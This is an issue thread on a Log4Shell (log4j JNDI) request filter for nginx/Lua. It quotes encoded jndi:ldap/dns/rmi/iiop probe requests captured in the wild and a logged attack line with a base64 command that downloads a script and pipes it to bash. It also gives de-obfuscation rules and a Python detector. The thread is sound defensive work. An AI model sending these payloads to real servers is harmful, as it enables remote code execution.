Urlencoded characters are not caught
igor-mendix opened this issue · 8 comments
Hi,
Thanks for the great work with this config!
Latest version doesn't catch requests like this (saw them in the wild):
"GET /?$%7bjndi%3aldap%3a%2f%2fydfewi7vgckh3orxnb49cwkjoau0ip.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?$%7bjndi%3adns%3a%2f%2fc8lg5ylo2ezz11xqi48cfocfn6twhl.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?$%7bjndi%3aiiop%3a%2f%2fu4zij83rzjyr5basijhrbvx14saiy7.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?%25pi%25to$%7bjndi%3adns%3a%2f%2fvts0e8tgqds3y5ijghfhph4pjgp6dv.d.x2f.me%2fa%7d=1 HTTP/1.1"
Don't know if it could cause exploitation of the vulnerability on the Java side, but might be worth it to include this in the filtering, just in case.
Thanks for reporting this!
Just checked our logs, and yes, we see such requests too.
"GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuMTAzLjcxLjIyMTo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuMTAzLjcxLjIyMTo4MCl8YmFzaA==} HTTP/1.1"
I will release a new version in the next minutes. Testing seems to work:
$ curl 'https://target.example.com/?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1'
...
2021/12/14 07:47:40 [error] 20998#20998: *10032 [lua] rewrite_by_lua(luaheader.conf:36):26: Found potential log4j attack in request: /?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1, client: 192.168.15.20, server: target.example.com, request: "GET /?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1 HTTP/1.1", host: "target.example.com"
Wouldn't it be better to use ngx.unescape_uri(str)? jndi itself may be escaped too. And I imagine it could also be obfuscated in the same way headers are, so maybe it'd be reasonable to unescape first, and then run it through the same transformations the headers go through:
-- collapse ${lower:xyz} / ${upper:xyz} wrappers to the bare letters
s=string.gsub(s, "${lower:(%a+)}", "%1")
s=string.gsub(s, "${upper:(%a+)}", "%1")
-- collapse ${env:NAME:-x} and ${::-xyz} default-value lookups to the default
s=string.gsub(s, "${env:[%a_-]+:%-([%a:])}", "%1")
s=string.gsub(s, "${::%-(%a+)}", "%1")
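The normalization pipeline proposed above (percent-decode first, then strip the lookup wrappers, then look for the jndi lookup), as an added standalone Python port for scanning access-log request lines; it is not the project's Lua code. It assumes constructed sample lines with the placeholder host scanner.invalid, matches case-insensitively, and repeats decoding a bounded number of times so the %25 double-encoding from the report is unwrapped.

```python
import re
from urllib.parse import unquote

# Python ports of the four Lua gsub transforms quoted in the thread
# (constructed port, not the project's code); matched case-insensitively.
LOOKUP_TRANSFORMS = [
    (re.compile(r"\$\{lower:([a-z]+)\}", re.I), r"\1"),
    (re.compile(r"\$\{upper:([a-z]+)\}", re.I), r"\1"),
    (re.compile(r"\$\{env:[a-z_-]+:-([a-z:])\}", re.I), r"\1"),
    (re.compile(r"\$\{::-([a-z]+)\}", re.I), r"\1"),
]
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.I)


def normalize(s, max_rounds=3):
    """Percent-decode until stable (bounded, so %25-style double
    encoding is unwrapped), then strip lookup wrappers until stable."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    changed = True
    while changed:
        changed = False
        for pattern, repl in LOOKUP_TRANSFORMS:
            new = pattern.sub(repl, s)
            if new != s:
                s, changed = new, True
    return s


def is_suspicious(request_line):
    """True when the normalized request line contains a ${jndi: lookup."""
    return JNDI_LOOKUP.search(normalize(request_line)) is not None


def scan(lines):
    """Return the request lines that should be flagged."""
    return [line for line in lines if is_suspicious(line)]


# Constructed sample request lines modeled on the report; scanner.invalid
# is a placeholder host, not an indicator from the thread.
SAMPLE_LINES = [
    "GET /?$%7bjndi%3aldap%3a%2f%2fscanner.invalid%2fa%7d=1 HTTP/1.1",
    "GET /?%25pi%25to$%7bjndi%3adns%3a%2f%2fscanner.invalid%2fa%7d=1 HTTP/1.1",
    "GET /?x=$%7b$%7blower%3aj%7dndi%3armi%3a%2f%2fscanner.invalid%2fa%7d=1 HTTP/1.1",
    "GET /index.html?q=jndi+tutorial HTTP/1.1",
    "GET /?q=%24%7Bdate%3Ayyyy-MM-dd%7D HTTP/1.1",
]
```

The last two sample lines are benign on purpose: a bare "jndi" substring and an unrelated percent-encoded lookup must not be flagged, only a real ${jndi: lookup after normalization.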
I will take a look at it. Code collaborations are welcome, just saying ;-)
I know, just don't have time right now to experiment (never did anything with Lua), and this is the case when it's better to realize it faster :)
never did anything with Lua
Same here, kind of "forced to look into lua" because of this vulnerability - but it's fascinating.
I've added a new PR to address this topic.
@igor-mendix Should be fixed now by #8
Thanks!